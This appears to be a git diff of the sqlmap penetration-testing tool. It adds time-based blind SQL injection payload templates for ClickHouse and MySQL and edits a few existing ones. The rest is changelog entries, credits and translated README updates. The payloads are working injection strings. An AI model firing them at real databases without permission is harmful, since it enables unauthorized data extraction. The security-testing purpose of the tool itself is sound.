+ + MySQL >= 5.0.12 RLIKE time-based blind 5 @@ -1412,6 +1494,44 @@ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+ + + + ClickHouse OR time-based blind (heavy query) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+ + @@ -1500,7 +1620,7 @@ - MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries) + MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) 5 4 2 @@ -1519,6 +1639,26 @@ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 3 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL time-based blind - Parameter replace (bool) 5 @@ -1778,7 +1918,7 @@ 4 2 1,2,3,9 - 1 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) @@ -1798,7 +1938,7 @@ 5 2 1,2,3,9 - 1 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) @@ -1854,7 +1994,7 @@ - MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query) + MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) 5 4 2 diff --git a/data/xml/queries.xml b/data/xml/queries.xml index 75f6edf9536..37a4b0c2a6e 100644 --- a/data/xml/queries.xml +++ b/data/xml/queries.xml @@ -207,7 +207,7 @@ - + @@ -228,7 +228,7 @@ - + @@ -261,11 +261,11 @@ - + - + - + - + - + - + - + @@ -302,7 +302,7 @@ - + @@ -357,8 +357,8 @@ - - + + @@ -606,7 +606,7 @@ - + @@ -621,7 +621,7 @@ - + @@ -631,24 +631,24 @@ - + - + - + - + @@ -656,7 +656,7 @@ - + @@ -679,8 +679,8 @@ - - + + @@ -747,10 +747,10 @@ - - - - + + + + @@ -770,7 +770,7 @@ - + @@ -778,11 +778,11 @@ - + - + @@ -875,8 +875,8 @@ - - + + @@ -938,10 +938,10 @@ - - - - + + + + @@ -962,11 +962,11 @@ - + - + @@ -975,11 +975,11 @@ - + - + @@ -1319,6 +1319,75 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index a44672e0105..5eab5958460 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,3 +1,28 @@ +# Version 1.9 (2025-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1) + +# Version 1.8 (2024-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1) + +# Version 1.7 (2023-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1) + +# Version 1.6 (2022-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1) + +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + # Version 1.4 (2020-01-01) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) diff --git a/doc/THANKS.md b/doc/THANKS.md index dc49071a915..3d5e9ec7e75 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -109,6 +109,9 @@ Alessandro Curio, Alessio Dalla Piazza, * for reporting a couple of bugs +Alexis Danizan, +* for contributing support for ClickHouse + Sherif El-Deeb, * for reporting a minor bug diff --git a/doc/translations/README-ar-AR.md b/doc/translations/README-ar-AR.md new file mode 100644 index 00000000000..53b62f51d8c --- /dev/null +++ b/doc/translations/README-ar-AR.md @@ -0,0 +1,68 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +
+ +برنامج sqlmap هو أداة اختبار اختراق مفتوحة المصدر تقوم بأتمتة عملية اكتشاف واستغلال ثغرات حقن SQL والسيطرة على خوادم قواعد البيانات. يأتي مع محرك كشف قوي، والعديد من الميزات المتخصصة لمختبر الاختراق المحترف، ومجموعة واسعة من الخيارات بما في ذلك تحديد بصمة قاعدة البيانات، واستخراج البيانات من قاعدة البيانات، والوصول إلى نظام الملفات الأساسي، وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق. + +لقطات الشاشة +---- + +
+ +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +
+ +يمكنك زيارة [مجموعة لقطات الشاشة](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) التي توضح بعض الميزات في الويكي. + +التثبيت +---- + +يمكنك تحميل أحدث إصدار tarball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/tarball/master) أو أحدث إصدار zipball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/zipball/master). + +يفضل تحميل sqlmap عن طريق استنساخ مستودع [Git](https://github.com/sqlmapproject/sqlmap): + +
+ + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +
+ +يعمل sqlmap مباشرة مع [Python](https://www.python.org/download/) إصدار **2.6** و **2.7** و **3.x** على أي نظام تشغيل. + +الاستخدام +---- + +للحصول على قائمة بالخيارات والمفاتيح الأساسية استخدم: + +
+ + python sqlmap.py -h + +
+ +للحصول على قائمة بجميع الخيارات والمفاتيح استخدم: + +
+ + python sqlmap.py -hh + +
+ +يمكنك العثور على مثال للتشغيل [هنا](https://asciinema.org/a/46601). +للحصول على نظرة عامة على إمكانيات sqlmap، وقائمة الميزات المدعومة، ووصف لجميع الخيارات والمفاتيح، مع الأمثلة، ننصحك بمراجعة [دليل المستخدم](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +الروابط +---- + +* الصفحة الرئيسية: https://sqlmap.org +* التحميل: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) أو [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* تغذية التحديثات RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* تتبع المشكلات: https://github.com/sqlmapproject/sqlmap/issues +* دليل المستخدم: https://github.com/sqlmapproject/sqlmap/wiki +* الأسئلة الشائعة: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* تويتر: [@sqlmap](https://x.com/sqlmap) +* العروض التوضيحية: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* لقطات الشاشة: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md index 18a3a67baa9..af3de550924 100644 --- a/doc/translations/README-bg-BG.md +++ b/doc/translations/README-bg-BG.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система. @@ -20,7 +20,7 @@ sqlmap e инструмент за тестване и проникване, с git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. +sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. Използване ---- @@ -45,6 +45,6 @@ sqlmap работи самостоятелно с [Python](http://www.python.org * Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues * Упътване: https://github.com/sqlmapproject/sqlmap/wiki * Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ckb-KU.md b/doc/translations/README-ckb-KU.md new file mode 100644 index 00000000000..6bb8fca22bc --- /dev/null +++ b/doc/translations/README-ckb-KU.md @@ -0,0 +1,67 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + + +
+ + + +بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە کە بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە کە کێشەی ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها کۆمەڵێک سکریپتی بەرفراوانی هەیە کە ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن لەگەڵ بنکەدراوە. لە کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم و جێبەجێکردنی فەرمانەکان لە ڕێگەی پەیوەندی Out Of Band لە سیستەمی کارگێڕدا. + + +سکرین شاتی ئامرازەکە +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +بۆ بینینی [کۆمەڵێک سکرین شات و سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت. + + +دامەزراندن +---- + +بۆ دابەزاندنی نوێترین وەشانی tarball، کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت. + +باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap لە دەرەوەی سندوق کاردەکات لەگەڵ [Python](https://www.python.org/download/) وەشانی **2.6**، **2.7** و **3.x** لەسەر هەر پلاتفۆرمێک. + +چۆنیەتی بەکارهێنان +---- + +بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان و سویچەکان ئەمانە بەکاربهێنە: + + python sqlmap.py -h + +بۆ بەدەستهێنانی لیستی هەموو بژاردە و سویچەکان ئەمە بەکار بێنا: + + python sqlmap.py -hh + +دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601). +بۆ بەدەستهێنانی تێڕوانینێکی گشتی لە تواناکانی sqlmap، لیستی تایبەتمەندییە پشتگیریکراوەکان، و وەسفکردنی هەموو هەڵبژاردن و سویچەکان، لەگەڵ نموونەکان، ئامۆژگاریت دەکرێت کە ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +بەستەرەکان +---- + +* ماڵپەڕی سەرەکی: https://sqlmap.org +* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* فیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues +* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki +* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* وێنەی شاشە: https://github.com/sqlmapproject/sqlmap/wiki/وێنەی شاشە + +وەرگێڕانەکان diff --git a/doc/translations/README-de-GER.md b/doc/translations/README-de-DE.md similarity index 69% rename from doc/translations/README-de-GER.md rename to doc/translations/README-de-DE.md index 9067cf6e8fe..379a0575c52 100644 --- a/doc/translations/README-de-GER.md +++ b/doc/translations/README-de-DE.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen. @@ -20,7 +20,7 @@ Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.c git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funktioniert sofort mit den [Python](http://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. Benutzung --- @@ -44,6 +44,6 @@ Links * Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues * Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki * Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrationen: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md index 4cc33684fb3..4432ae85835 100644 --- a/doc/translations/README-es-MX.md +++ b/doc/translations/README-es-MX.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". @@ -19,7 +19,7 @@ Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https:/ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. Uso --- @@ -44,6 +44,6 @@ Enlaces * Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues * Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki * Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fa-IR.md b/doc/translations/README-fa-IR.md index 207e46bcdab..e3d9daf604c 100644 --- a/doc/translations/README-fa-IR.md +++ b/doc/translations/README-fa-IR.md @@ -1,16 +1,16 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
-برنامه `sqlmap`، برنامه‌ی منبع باز هست که برای تست نفوذ پذیزی دربرابر حمله‌های احتمالی `sql injection` (جلوگیری از لو رفتن پایگاه داده) جلو گیری می‌کند. این برنامه مجهز به مکانیزیم تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصص تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق `via out-of-band` درسیستم عامل را امکان پذیر می‌کند. +برنامه `sqlmap`، یک برنامه‌ی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند. -عکس +تصویر محیط ابزار ---- @@ -23,7 +23,7 @@
-برای دیدن کردن از [مجموعه‌ی از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از ویکی دیدن کنید. +برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید. نصب @@ -32,11 +32,11 @@ برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید. -طرز استفاده +نحوه استفاده ---- -برای گرفتن لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید: +برای دریافت لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید: @@ -53,7 +53,7 @@
-برای گرفتن لیست تمامی ارگومان‌های می‌توانید از دستور زیر استفاده کنید: +برای دریافت لیست تمامی ارگومان‌ها می‌توانید از دستور زیر استفاده کنید:
@@ -66,7 +66,7 @@
-برای اطلاعات بیشتر برای اجرا از [اینجا](https://asciinema.org/a/46601) می‌توانید استفاده کنید. برای گرفتن اطلاعات بیشتر توسعه می‌شود به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. +برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. لینک‌ها @@ -74,11 +74,11 @@ * خانه: https://sqlmap.org -* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues +* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues * راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki * سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* تویتر: [@sqlmap](https://twitter.com/sqlmap) -* رسانه: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* عکس‌ها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* توییتر: [@sqlmap](https://x.com/sqlmap) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md index 293262c1c56..964f7e1045a 100644 --- a/doc/translations/README-fr-FR.md +++ b/doc/translations/README-fr-FR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 